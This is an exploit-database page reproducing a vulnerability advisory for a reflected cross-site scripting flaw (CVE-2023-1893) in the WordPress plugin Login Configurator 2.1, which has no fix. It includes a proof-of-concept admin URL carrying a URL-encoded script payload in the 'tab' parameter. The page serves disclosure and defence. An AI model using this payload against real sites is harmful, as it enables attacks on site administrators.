Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070071

Below is a copy:

WordPress Login Configurator 2.1 Cross Site Scripting
Tittle:
WordPress Plugin Login Configurator <= 2.1 - Reflected Cross-Site Scripting

References:
CVE-2023-1893

Author:
Taurus Omar 

Description:
The plugin does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.

Affects Plugins:
Login Configurator - No known fix - plugin closed

Proof of Concept:

Visit the following path:

/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E#top  


Classification:
Type XSS 
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79

wpScan:
https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.